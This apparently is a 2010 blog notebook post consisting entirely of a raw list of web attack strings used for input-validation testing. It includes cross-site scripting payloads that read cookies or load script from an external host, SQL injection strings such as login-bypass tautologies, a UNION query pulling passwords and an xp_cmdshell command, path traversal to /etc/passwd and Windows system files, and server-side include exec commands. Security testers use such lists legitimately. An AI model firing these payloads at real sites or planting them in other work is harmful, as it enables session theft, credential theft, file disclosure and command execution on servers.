10 11 2010

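XSS test: a mixed list of input-validation test strings (XSS, SQL injection, path traversal, server-side include), shown here with backslash-escaped quotes and literal \r\n separators between entries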

bigCat Posted in NoteBook - Comment.isNotBlank
\'><script>alert(document.cookie)</script>\r\n=\'><script>alert(document.cookie)</script>\r\n<script>alert(document.cookie)</script>\r\n<script>alert(vulnerable)</script>\r\n%3Cscript%3Ealert(\'XSS\')%3C/script%3E\r\n<script>alert(\'XSS\')</script>\r\n<img src=\"javascript:alert(\'XSS\')\">\r\n%0a%0a<script>alert(\\\"Vulnerable\\\")</script>.jsp\r\n%22%3cscript%3ealert(%22xss%22)%3c/script%3e\r\n%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\r\n%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini\r\n%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e\r\n%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e\r\n%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html\r\n%3f.jsp\r\n%3f.jsp\r\n<script>alert(\'Vulnerable\');</script>\r\n<script>alert(\'Vulnerable\')</script>\r\n?sql_debug=1\r\na%5c.aspx\r\na.jsp/<script>alert(\'Vulnerable\')</script>\r\na/\r\na?<script>alert(\'Vulnerable\')</script>\r\n\"><script>alert(\'Vulnerable\')</script>\r\n\';exec%20master..xp_cmdshell%20\'dir%20 c:%20>%20c:\\inetpub\\wwwroot\\?.txt\'--&&\r\n%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E\r\n%3Cscript%3Ealert(document. 
domain);%3C/script%3E&\r\n%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=\r\n1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=\r\n../../../../../../../../etc/passwd\r\n..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini\r\n\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini\r\n\'\';!--\"<XSS>=&{()}\r\n<IMG SRC=\"javascript:alert(\'XSS\');\">\r\n<IMG SRC=javascript:alert(\'XSS\')>\r\n<IMG SRC=JaVaScRiPt:alert(\'XSS\')>\r\n<IMG SRC=JaVaScRiPt:alert(\"XSS\")>\r\n<IMG SRC=javascript:alert(\'XSS\')>\r\n<IMG SRC=javascript:alert(\'XSS\')>\r\n<IMG SRC=javascript:alert(\'XSS\')>\r\n<IMG SRC=\"jav ascript:alert(\'XSS\');\">\r\n<IMG SRC=\"jav ascript:alert(\'XSS\');\">\r\n<IMG SRC=\"jav ascript:alert(\'XSS\');\">\r\n\"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";\' > out\r\n<IMG SRC=\" javascript:alert(\'XSS\');\">\r\n<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>\r\n<BODY BACKGROUND=\"javascript:alert(\'XSS\')\">\r\n<BODY ONLOAD=alert(\'XSS\')>\r\n<IMG DYNSRC=\"javascript:alert(\'XSS\')\">\r\n<IMG LOWSRC=\"javascript:alert(\'XSS\')\">\r\n<BGSOUND SRC=\"javascript:alert(\'XSS\');\">\r\n<br size=\"&{alert(\'XSS\')}\">\r\n<LAYER SRC=\"http://xss.ha.ckers.org/a.js\"></layer>\r\n<LINK REL=\"stylesheet\" HREF=\"javascript:alert(\'XSS\');\">\r\n<IMG SRC=\'vbscript:msgbox(\"XSS\")\'>\r\n<IMG SRC=\"mocha:[code]\">\r\n<IMG SRC=\"livescript:[code]\">\r\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(\'XSS\');\">\r\n<IFRAME SRC=javascript:alert(\'XSS\')></IFRAME>\r\n<FRAMESET><FRAME SRC=javascript:alert(\'XSS\')></FRAME></FRAMESET>\r\n<TABLE BACKGROUND=\"javascript:alert(\'XSS\')\">\r\n<DIV STYLE=\"background-image: url(javascript:alert(\'XSS\'))\">\r\n<DIV STYLE=\"behaviour: url(\'http://www.how-to-hack.org/exploit.html\');\">\r\n<DIV STYLE=\"width: expression(alert(\'XSS\'));\">\r\n<STYLE>@im\\port\'\\ja\\vasc\\ript:alert(\"XSS\")\';</STYLE>\r\n<IMG STYLE=\'xss:expre\\ssion(alert(\"XSS\"))\'>\r\n<STYLE 
TYPE=\"text/javascript\">alert(\'XSS\');</STYLE>\r\n<STYLE TYPE=\"text/css\">.XSS{background-image:url(\"javascript:alert(\'XSS\')\");}</STYLE><A CLASS=XSS></A>\r\n<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert(\'XSS\')\")}</STYLE>\r\n<BASE HREF=\"javascript:alert(\'XSS\');//\">\r\ngetURL(\"javascript:alert(\'XSS\')\")\r\na=\"get\";b=\"URL\";c=\"javascript:\";d=\"alert(\'XSS\');\";eval(a+b+c+d);\r\n<XML SRC=\"javascript:alert(\'XSS\');\">\r\n\"> <BODY ONLOAD=\"a();\"><SCRIPT>function a(){alert(\'XSS\');}</SCRIPT><\"\r\n<SCRIPT SRC=\"http://xss.ha.ckers.org/xss.jpg\"></SCRIPT>\r\n<IMG SRC=\"javascript:alert(\'XSS\')\"\r\n<!--#exec cmd=\"/bin/echo \'<SCRIPT SRC\'\"--><!--#exec cmd=\"/bin/echo \'=http://xss.ha.ckers.org/a.js></SCRIPT>\'\"-->\r\n<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">\r\n<SCRIPT a=\">\" SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>\r\n<SCRIPT =\">\" SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>\r\n<SCRIPT a=\">\" \'\' SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>\r\n<SCRIPT \"a=\'>\'\" SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>\r\n<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://xss.ha.ckers.org/a.js\"></SCRIPT>\r\n<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>\r\nadmin\'--\r\n\' or 0=0 --\r\n\" or 0=0 --\r\nor 0=0 --\r\n\' or 0=0 #\r\n\" or 0=0 #\r\nor 0=0 #\r\n\' or \'x\'=\'x\r\n\" or \"x\"=\"x\r\n\') or (\'x\'=\'x\r\n\' or 1=1--\r\n\" or 1=1--\r\nor 1=1--\r\n\' or a=a--\r\n\" or \"a\"=\"a\r\n\') or (\'a\'=\'a\r\n\") or (\"a\"=\"a\r\nhi\" or \"a\"=\"a\r\nhi\" or 1=1 --\r\nhi\' or 1=1 --\r\nhi\' or \'a\'=\'a\r\nhi\') or (\'a\'=\'a\r\nhi\") or (\"a\"=\"a 
